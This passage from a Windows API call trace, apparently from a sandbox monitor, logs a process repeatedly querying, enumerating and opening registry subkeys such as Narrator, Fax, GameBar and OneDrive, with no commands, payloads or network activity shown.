lpName=0x9aeb74, cchName=0xa | out: lpName="Narrator") returned 0x0 [0057.730] RegCreateKeyExW (in: hKey=0x210, lpSubKey="Narrator", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x9aeb38, lpdwDisposition=0x0 | out: phkResult=0x9aeb38*=0x214, lpdwDisposition=0x0) returned 0x0 [0057.730] RegCloseKey (hKey=0x214) returned 0x0 [0057.730] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.731] RegEnumKeyW (in: hKey=0x210, dwIndex=0x28, lpName=0x9aeb74, cchName=0xa | out: lpName="") returned 0xea [0057.731] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.731] RegEnumKeyW (in: hKey=0x210, dwIndex=0x32, lpName=0x9aeb74, cchName=0xa | out: lpName="") returned 0xea [0057.731] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.731] RegEnumKeyW (in: hKey=0x210, dwIndex=0x2c, lpName=0x9aeb74, cchName=0xa | out: lpName="WAB") returned 0x0 [0057.731] RegCreateKeyExW (in: hKey=0x210, lpSubKey="WAB", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x9aeb38, lpdwDisposition=0x0 | out: phkResult=0x9aeb38*=0x214, lpdwDisposition=0x0) returned 0x0 [0057.731] RegCloseKey (hKey=0x214) returned 0x0 [0057.732] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.732] RegEnumKeyW (in: hKey=0x210, dwIndex=0xa, lpName=0x9aeb74, cchName=0xa | out: lpName="") returned 0xea [0057.732] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.732] RegEnumKeyW (in: hKey=0x210, dwIndex=0xd, lpName=0x9aeb74, cchName=0xa | out: lpName="Feeds") returned 0x0 [0057.732] RegCreateKeyExW (in: hKey=0x210, lpSubKey="Feeds", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x9aeb38, lpdwDisposition=0x0 | out: phkResult=0x9aeb38*=0x214, lpdwDisposition=0x0) returned 0x0 [0057.732] RegCloseKey (hKey=0x214) returned 0x0 [0057.732] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.733] RegEnumKeyW (in: hKey=0x210, dwIndex=0x2d, lpName=0x9aeb74, cchName=0xa | out: lpName="WcmSvc") returned 0x0 [0057.733] RegCreateKeyExW (in: hKey=0x210, lpSubKey="WcmSvc", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x9aeb38, lpdwDisposition=0x0 | out: phkResult=0x9aeb38*=0x214, lpdwDisposition=0x0) returned 0x0 [0057.733] RegCloseKey (hKey=0x214) returned 0x0 [0057.733] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.733] RegEnumKeyW (in: hKey=0x210, dwIndex=0x32, lpName=0x9aeb74, cchName=0xa | out: lpName="") returned 0xea [0057.733] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.733] RegEnumKeyW (in: hKey=0x210, dwIndex=0x15, lpName=0x9aeb74, cchName=0xa | out: lpName="") returned 0xea [0057.733] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.734] RegEnumKeyW (in: hKey=0x210, dwIndex=0x0, lpName=0x9aeb74, cchName=0xa | out: lpName="") returned 0xea [0057.734] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.734] RegEnumKeyW (in: hKey=0x210, dwIndex=0x1a, lpName=0x9aeb74, cchName=0xa | out: lpName="Narrator") returned 0x0 [0057.734] RegCreateKeyExW (in: hKey=0x210, lpSubKey="Narrator", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x9aeb38, lpdwDisposition=0x0 | out: phkResult=0x9aeb38*=0x214, lpdwDisposition=0x0) returned 0x0 [0057.734] RegCloseKey (hKey=0x214) returned 0x0 [0057.734] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.734] RegEnumKeyW (in: hKey=0x210, dwIndex=0x26, lpName=0x9aeb74, cchName=0xa | out: lpName="Speech") returned 0x0 [0057.734] RegCreateKeyExW (in: hKey=0x210, lpSubKey="Speech", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x9aeb38, lpdwDisposition=0x0 | out: phkResult=0x9aeb38*=0x214, lpdwDisposition=0x0) returned 0x0 [0057.735] RegCloseKey (hKey=0x214) returned 0x0 [0057.735] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.735] RegEnumKeyW (in: hKey=0x210, dwIndex=0x19, lpName=0x9aeb74, cchName=0xa | out: lpName="") returned 0xea [0057.735] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.735] RegEnumKeyW (in: hKey=0x210, dwIndex=0xc, lpName=0x9aeb74, cchName=0xa | out: lpName="Fax") returned 0x0 [0057.735] RegCreateKeyExW (in: hKey=0x210, lpSubKey="Fax", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x9aeb38, lpdwDisposition=0x0 | out: phkResult=0x9aeb38*=0x214, lpdwDisposition=0x0) returned 0x0 [0057.735] RegCloseKey (hKey=0x214) returned 0x0 [0057.736] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.736] RegEnumKeyW (in: hKey=0x210, dwIndex=0x28, lpName=0x9aeb74, cchName=0xa | out: lpName="") returned 0xea [0057.736] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.736] RegEnumKeyW (in: hKey=0x210, dwIndex=0x22, lpName=0x9aeb74, cchName=0xa | out: lpName="") returned 0xea [0057.736] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.736] RegEnumKeyW (in: hKey=0x210, dwIndex=0x4, lpName=0x9aeb74, cchName=0xa | out: lpName="") returned 0xea [0057.736] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.736] RegEnumKeyW (in: hKey=0x210, dwIndex=0xf, lpName=0x9aeb74, cchName=0xa | out: lpName="GameBar") returned 0x0 [0057.737] RegCreateKeyExW (in: hKey=0x210, lpSubKey="GameBar", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x9aeb38, lpdwDisposition=0x0 | out: phkResult=0x9aeb38*=0x214, lpdwDisposition=0x0) returned 0x0 [0057.737] RegCloseKey (hKey=0x214) returned 0x0 [0057.737] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.737] RegEnumKeyW (in: hKey=0x210, dwIndex=0x14, lpName=0x9aeb74, cchName=0xa | out: lpName="Keyboard") returned 0x0 [0057.737] RegCreateKeyExW (in: hKey=0x210, lpSubKey="Keyboard", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x9aeb38, lpdwDisposition=0x0 | out: phkResult=0x9aeb38*=0x214, lpdwDisposition=0x0) returned 0x0 [0057.737] RegCloseKey (hKey=0x214) returned 0x0 [0057.737] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.738] RegEnumKeyW (in: hKey=0x210, dwIndex=0x34, lpName=0x9aeb74, cchName=0xa | out: lpName="Wisp") returned 0x0 [0057.738] RegCreateKeyExW (in: hKey=0x210, lpSubKey="Wisp", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x9aeb38, lpdwDisposition=0x0 | out: phkResult=0x9aeb38*=0x214, lpdwDisposition=0x0) returned 0x0 [0057.738] RegCloseKey (hKey=0x214) returned 0x0 [0057.738] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.738] RegEnumKeyW (in: hKey=0x210, dwIndex=0x2, lpName=0x9aeb74, cchName=0xa | out: lpName="") returned 0xea [0057.738] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.738] RegEnumKeyW (in: hKey=0x210, dwIndex=0x10, lpName=0x9aeb74, cchName=0xa | out: lpName="") returned 0xea [0057.738] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.739] RegEnumKeyW (in: hKey=0x210, dwIndex=0x16, lpName=0x9aeb74, cchName=0xa | out: lpName="") returned 0xea [0057.739] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.739] RegEnumKeyW (in: hKey=0x210, dwIndex=0xe, lpName=0x9aeb74, cchName=0xa | out: lpName="FTP") returned 0x0 [0057.739] RegCreateKeyExW (in: hKey=0x210, lpSubKey="FTP", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x9aeb38, lpdwDisposition=0x0 | out: phkResult=0x9aeb38*=0x214, lpdwDisposition=0x0) returned 0x0 [0057.739] RegCloseKey (hKey=0x214) returned 0x0 [0057.739] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.739] RegEnumKeyW (in: hKey=0x210, dwIndex=0x1b, lpName=0x9aeb74, cchName=0xa | out: lpName="OneDrive") returned 0x0 [0057.740] RegCreateKeyExW (in: hKey=0x210, lpSubKey="OneDrive", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x9aeb38, lpdwDisposition=0x0 | out: phkResult=0x9aeb38*=0x214, lpdwDisposition=0x0) returned 0x0 [0057.740] RegCloseKey (hKey=0x214) returned 0x0 [0057.740] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.740] RegEnumKeyW (in: hKey=0x210, dwIndex=0x7, lpName=0x9aeb74, cchName=0xa | out: lpName="") returned 0xea [0057.740] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.740] RegEnumKeyW (in: hKey=0x210, dwIndex=0x12, lpName=0x9aeb74, cchName=0xa | out: lpName="") returned 0xea [0057.740] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.740] RegEnumKeyW (in: hKey=0x210, dwIndex=0x10, lpName=0x9aeb74, cchName=0xa | out: lpName="") returned 0xea [0057.741] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.741] RegEnumKeyW (in: hKey=0x210, dwIndex=0x2f, lpName=0x9aeb74, cchName=0xa | out: lpName="Windows") returned 0x0 [0057.741] RegCreateKeyExW (in: hKey=0x210, lpSubKey="Windows", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x9aeb38, lpdwDisposition=0x0 | out: phkResult=0x9aeb38*=0x214, lpdwDisposition=0x0) returned 0x0 [0057.741] RegCloseKey (hKey=0x214) returned 0x0 [0057.741] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.741] RegEnumKeyW (in: hKey=0x210, dwIndex=0x22, 